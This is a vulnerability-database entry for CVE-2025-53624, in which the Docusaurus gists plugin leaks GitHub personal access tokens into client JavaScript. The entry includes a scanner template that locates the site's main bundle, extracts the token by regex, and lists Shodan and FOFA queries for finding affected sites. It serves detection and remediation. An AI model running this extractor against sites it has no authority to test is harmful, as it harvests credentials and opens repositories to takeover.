Docusaurus Gists Plugin < 4.0.0 - GitHub Personal Access Token Exposure
CVE-2025-53624
Verified
Description
The Docusaurus gists plugin adds a page to your Docusaurus instance, displaying all public gists of a GitHub user. docusaurus-plugin-content-gists versions prior to 4.0.0 are vulnerable to exposing GitHub Personal Access Tokens in production build artifacts when passed through plugin configuration options. The token, intended for build-time API access only, is inadvertently included in client-side JavaScript bundles, making it accessible to anyone who can view the website's source code.
Severity
High
CVSS Score
8.6
Exploit Probability
14%
Affected Product
docusaurus_plugin_content_gists
Published Date
July 10, 2025
Template Author
darses
CVE-2025-53624.yaml
id: CVE-2025-53624
info:
name: Docusaurus Gists Plugin < 4.0.0 - GitHub Personal Access Token Exposure
author: darses
severity: high
description: |
The Docusaurus gists plugin adds a page to your Docusaurus instance, displaying all public gists of a GitHub user. docusaurus-plugin-content-gists versions prior to 4.0.0 are vulnerable to exposing GitHub Personal Access Tokens in production build artifacts when passed through plugin configuration options. The token, intended for build-time API access only, is inadvertently included in client-side JavaScript bundles, making it accessible to anyone who can view the website's source code.
impact: |
A GitHub personal access token exposure vulnerability can grant an attacker unauthorized access to your repositories and organization resources, potentially leading to data exfiltration, code injection, and supply chain attacks.
remediation: |
Update docusaurus-plugin-content-gists to version 4.0.0+. Revoke access to the GitHub PAT that was used: https://github.com/settings/tokens.
reference:
- https://github.com/webbertakken/docusaurus-plugin-content-gists/commit/8d4230b82412edb215ddfa9e609d178510a5fe31
- https://github.com/webbertakken/docusaurus-plugin-content-gists/security/advisories/GHSA-qf34-qpr4-5pph
- https://nvd.nist.gov/vuln/detail/CVE-2025-53624
classification:
epss-score: 0.14371
epss-percentile: 0.94484
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
cvss-score: 8.6
cve-id: CVE-2025-53624
cwe-id: CWE-200
metadata:
max-request: 2
verified: true
vendor: webbertakken
product: docusaurus_plugin_content_gists
shodan-query: http.html:"Docusaurus"
fofa-query: body="Docusaurus"
tags: cve,cve2025,docusaurus,exposure,vuln
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "docusaurus_locale")'
condition: and
internal: true
extractors:
- type: regex
name: js_file_url
group: 1
regex:
- '<script src="/(assets/js/main\.[^"]*\.js)"'
internal: true
- method: GET
path:
- "{{BaseURL}}/{{js_file_url}}"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "personalAccessToken")'
condition: and
extractors:
- type: regex
name: github_token
group: 1
regex:
- ',personalAccessToken:"([^"]*)"}'
# digest: 4a0a00473045022100bd9f72f87fb92bab18bfb0fbabcb91c8ffa307d0be416f0a3e015d685f374262022068434a94e8749ad94a3e89a88432072b8c3676e5379566d6acad7df7fde93d5c:922c64590222798bb761d5b6d8e729508.6Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
CVE ID:
cve-2025-53624
CWE ID:
cwe-200
Remediation Steps
Update docusaurus-plugin-content-gists to version 4.0.0+. Revoke access to the GitHub PAT that was used: https://github.com/settings/tokens.